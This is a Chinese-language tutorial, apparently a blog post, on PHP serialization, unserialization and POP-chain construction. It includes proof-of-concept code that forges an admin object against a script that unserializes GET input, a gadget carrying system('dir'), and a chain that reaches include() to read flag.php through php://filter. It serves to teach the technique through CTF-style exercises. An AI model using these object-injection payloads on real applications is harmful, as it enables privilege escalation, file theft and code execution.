PHP 反序列化

一、PHP 序列化

1、对象的序列化
php 复制代码
<?php
class people{
    public $name='Gaming';
    private $Nation='Liyue';
    protected $Birthday='12/22';

    public function say(){
        echo "老板你好呀,我是和记厅的镖师,叫我嘉明就行,要运货吗你?";
    }
}
$Gaming=new people();
echo $Gaming->name;
echo '<br>';
$a=serialize($Gaming);  //将 对象 $Gaming 序列化为 字符串
echo $a;
echo '<br>';
$c=urlencode($a);       //将 字符串 $a 进行 url 编码
echo $c;

运行:

Gaming O:6:"people":3:{s:4:"name";s:6:"Gaming";s:14:"peopleNation";s:5:"Liyue";s:11:"*Birthday";s:5:"12/22";} O%3A6%3A%22people%22%3A3%3A%7Bs%3A4%3A%22name%22%3Bs%3A6%3A%22Gaming%22%3Bs%3A14%3A%22**%00people%00Nation** %22%3Bs%3A5%3A%22Liyue%22%3Bs%3A11%3A%22**%00%2A%00Birthday**%22%3Bs%3A5%3A%2212%2F22%22%3B%7D

O:(object)一个序列化的对象

6:类名的长度

3:类中有 3 个属性

s:(string)字符串

4:属性 长度

6:值 长度

2、数组的序列化
①、普通数组
php 复制代码
$arr=array('Gaming','Chongyun');
echo serialize($arr);

运行:

> a:2:{i:0;s:6:"Gaming";i:1;s:8:"Chongyun";}

a:数组

2:2 个值

i:索引

0:第 0 个

②、关联数组
php 复制代码
 $arr=array(
     'name' => 'Chongyun',
     'Nation' => 'Liyue',
     'Birthday' => '9/7'
 );
 echo serialize($arr);

运行:

a:3:{s:4:"name";s:8:"Chongyun";s:6:"Nation";s:5:"Liyue";s:8:"Birthday";s:3:"9/7";}

二、PHP 反序列化

php 复制代码
 $Gaming=new people();
 echo $Gaming->name;
 echo '<br>';
 $a=serialize($Gaming);  //将 对象 $Gaming 序列化为 字符串
 echo $a;
 echo '<br>';
 echo '<br>';
 print_r(unserialize($a));
 echo '<br>';
 echo '<br>';
 var_dump(unserialize($a));

运行:

Gaming O:6:"people":3:{s:4:"name";s:6:"Gaming";s:14:"peopleNation";s:5:"Liyue";s:11:"*Birthday";s:5:"12/22";}

people Object ( [name] => Gaming [Nation:people:private] => Liyue [Birthday:protected] => 12/22 )

object(people)#2 (3) { ["name"]=> string(6) "Gaming" ["Nation":"people":private]=> string(5) "Liyue" ["Birthday":protected]=> string(5) "12/22" }

获得一个 序列化 的字符串 :

O:6:"people":3:{s:4:"name";s:6:"Gaming";s:14:"peopleNation";s:5:"Liyue";s:11:"*Birthday";s:5:"12/22";}

手动添加 空字符

s:14:"%00 people**%00** Nation";s:5:"Liyue";s:11:"%00*%00Birthday";

篡改字符串信息,反序列化后得到 篡改后的 对象 :

php 复制代码
 highlight_file(__FILE__);
 class User {
     public $username='lili';
     public $isAdmin=0;
 }
 ​
 $userData = $_GET['data'];
 $user = unserialize($userData);
 if($user->isAdmin===1 && $user->username==='admin'){
     // 目标输出:欢迎你管理员~
     echo '欢迎你管理员~';
 }
 else{
     echo '你是一个普通用户!';
 }

编写脚本,得到序列化字符串

php 复制代码
class User {
     public $username='admin';
     public $isAdmin=1;
 }
 ​
 $user = new User();
 $serialized_data = serialize($user);
 echo $serialized_data;

GET 传参即可

三、pop链的构造

引入:
php 复制代码
if(isset($_GET['test'])){
    @unserialize($_GET['test']);
    highlight_file(__FILE__);
}
else{
    $a=new test;
}

POC 编写:

php 复制代码
class  test{
    private $index;
    function __construct()
    {
        $this->index=new execute();
    }
}

class execute{
    public  $test="system('dir');";
}
$a=new test();
echo urlencode(serialize($a));
```
例题:
php 复制代码
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}
class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}
class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

POC 构造:

php 复制代码
class Modifier {
 	protected  $var="flag.php"; #include函数使用为协议读取文件
 // protected  $var="php://filter/read=convert.base64-encode/resource=flag.php";
 }
 class Test{
     public $p;
 }
 class Show{
     public $source;
     public $str;
     //将另一个对象赋值给属性需要使用构造函数。
     public function __construct(){
         $this->str =new Test();  // 触发 __get()
     }
 }
 $new_show = new Show();  // 触发 POP链中的 __construct()
 $new_show->source = new Show();  // 触发 __toString()
 $new_show->source->str->p = new Modifier();  // 触发 __invoke()
 echo urlencode(serialize($new_show));
相关推荐
网安-轩逸2 小时前
IPv4地址表示法详解
开发语言·php
西猫雷婶5 小时前
python学opencv|读取图像(十九)使用cv2.rectangle()绘制矩形
开发语言·python·opencv
liuxin334455666 小时前
学籍管理系统:实现教育管理现代化
java·开发语言·前端·数据库·安全
码农W6 小时前
QT--静态插件、动态插件
开发语言·qt
ke_wu6 小时前
结构型设计模式
开发语言·设计模式·组合模式·简单工厂模式·工厂方法模式·抽象工厂模式·装饰器模式
code04号6 小时前
python脚本:批量提取excel数据
开发语言·python·excel
小王爱吃月亮糖6 小时前
C++的23种设计模式
开发语言·c++·qt·算法·设计模式·ecmascript
hakesashou7 小时前
python如何打乱list
开发语言·python
007php0077 小时前
linux服务器上CentOS的yum和Ubuntu包管理工具apt区别与使用实战
linux·运维·服务器·ubuntu·centos·php·ai编程
网络风云7 小时前
【魅力golang】之-反射
开发语言·后端·golang